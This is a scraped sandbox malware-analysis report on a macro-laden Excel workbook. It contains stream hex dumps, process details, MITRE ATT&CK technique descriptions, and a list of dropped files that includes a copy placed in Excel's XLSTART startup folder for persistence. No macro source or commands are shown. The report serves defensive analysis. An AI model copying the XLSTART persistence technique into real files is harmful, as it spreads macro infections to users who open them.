Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 1528

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_0
File Type:	data
Stream Size:	1528
Entropy:	4.0331260062199155
Base64 Encoded:	False
Data ASCII:	K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ g . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T E N ? d K ) . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . .
Data Raw:	93 4b 2a 97 01 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00 00 00 01 00 02 00 01 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 80 01 00 00 80 00 00 00 80 00 00 00 80 00 00 00 04 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 110

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_1
File Type:	data
Stream Size:	110
Entropy:	2.151776530683748
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . ~ } . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . . . p . . . . . . .
Data Raw:	72 55 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 01 00 00 7e 7d 00 00 7f 00 00 00 00 0a 00 00 00 09 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 09 00 00 00 00 00 03 00 09 00 00 00 00 00 05 00 03 00 00 09 e9 02 00 00 00 00 00 00 51 07 00 00 00 00 00 00 08 00 00 00 00 00 01 00 70 00 00 7f 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 860

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_2
File Type:	data
Stream Size:	860
Entropy:	3.7287422109348434
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . ~ \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . 9 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . y . . . . . . . 0 . . . . . . . . . % . . . . . . . . . x . . . $ . . . . . . . . x . < . . . . x . " . . . . . . x . . . $ . . . . . . . . x . . . . . x . . K . H . t . . . . . . . $ . . . 0 . . . l t . p . . . . . x . . . $ . . . . . .
Data Raw:	72 55 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 02 00 00 7e 7c 00 00 7f 00 00 00 00 0e 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 03 00 08 00 00 00 00 00 02 00 03 00 03 00 0b 00 00 00 f1 08 00 00 00 00 00 00 61 06 00 00 00 00 00 00 39 06 00 00 00 00 00 00 89 06 00 00 00 00 00 00 98 00 00 00 00 00 00 00 09 00 00 00 00 00 04 00 b1 06 00 00 00 00 00 00 b9 07 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 177

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_3
File Type:	data
Stream Size:	177
Entropy:	1.9781943059171514
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . ` . . . . . . . . . . . $ . . . . . . . . . . . ` . . . . . . . . . . . $ . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . n . . . . . . .
Data Raw:	72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 10 00 00 00 09 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff 00 00 00 00 08 00 00 00 04 00 24 00 81 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 24 00 a9 00 00 00 00 00 02 00 01 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 24 00

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_4, File Type: data, Stream Size: 336

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_4
File Type:	data
Stream Size:	336
Entropy:	1.729051085636129
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) . . . . . . . . . . . . . . . . + . 4 . . . Q . . . . . . . a . . . . . . . y . . . . . . . . . . . . ` . . . . . . .
Data Raw:	72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 1e 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 05 00 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 01 00 d9 06 00 00 00 00 00 00 01 07 00 00 00 00 00 00 29 07 00 00 00 00 00 00 ff ff ff ff b1 06 00 00 00 00 00 00 08 00 2b 00 34 00 00 00 51 07 00 00 00 00 00 00 61 00 00 00 00 00 01 00 79 07

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_5, File Type: data, Stream Size: 66

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_5
File Type:	data
Stream Size:	66
Entropy:	1.7286556726798767
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . n . . . . . . .
Data Raw:	72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 10 00 00 00 09 00 00 00 00 00 04 00 ff ff ff ff ff ff ff ff 00 00 00 00 40 00 00 00 04 00 00 00 00 00 00 00 6e 00 00 7f 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 534

General
Stream Path:	_VBA_PROJECT_CUR/VBA/dir
File Type:	data
Stream Size:	534
Entropy:	6.297141029335879
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . e . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E
Data Raw:	01 12 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 cf c3 be 65 02 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

Network Behavior

Report size exceeds maximum size, please checkout the PCAP download to see all network behavior

Statistics

CPU Usage

• EXCEL.EXE

Click to jump to process

Memory Usage

• EXCEL.EXE

Click to jump to process

High Level Behavior Distribution

• File
• Registry

Click to dive into process behavior distribution

System Behavior

Analysis Process: EXCEL.EXEPID: 2664, Parent PID: 576

Function Logs

General

Target ID:	0
Start time:	04:36:14
Start date:	07/02/2023
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase:	0x13f690000
File size:	28253536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

File Activities

File Opened

File Written

File Attributes Queried

Directory Queried

Other File Operations

Show Windows behavior

Section Activities

Sections loaded by Windows

Sections loaded by Program

Show Windows behavior

Registry Activities

Key Opened

Key Created

Key Deleted

Key Value Created

Key Value Deleted

Show Windows behavior

Mutex Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Process Activities

Process Information Set

Show Windows behavior

Thread Activities

Thread Created

Thread Delayed

Thread Information Set

Show Windows behavior

Memory Activities

Memory Usage Statistics

Show Windows behavior

System Activities

Language or Locale ID Queried

Show Windows behavior

Timing Activities

User Timer set

Show Windows behavior

Windows UI Activities

Window Created

Window UI Enumerated

Window UI Shown

Window UIs Event Hook Set

Show Windows behavior

LPC Port Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report dC3q98RyMT.xlsx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

System Summary

Hooking and other Techniques for Hiding and Protection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\~DFCAE982CA23539E76.TMP

C:\Users\user\AppData\Local\Temp\~DFD98A3D888EB1457C.TMP

C:\Users\user\AppData\Roaming\Microsoft\Excel\XLSTART\mypersonnel.xls

C:\Users\user\Desktop\dC3q98RyMT.xls

C:\Users\user\Desktop\~$dC3q98RyMT.xlsx

Static File Info

General

File Icon

Static OLE Info

General

OLE File "dC3q98RyMT.xlsx"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: Kangatang.bas, Stream Size: 3761

General

VBA Code

VBA File Name: ThisWorkbook.cls, Stream Size: 1158

General

VBA Code

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 107

General

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 1160

General

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 232

General

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 707687

General

Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 345

General

Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 71

Windows Analysis Report
dC3q98RyMT.xlsx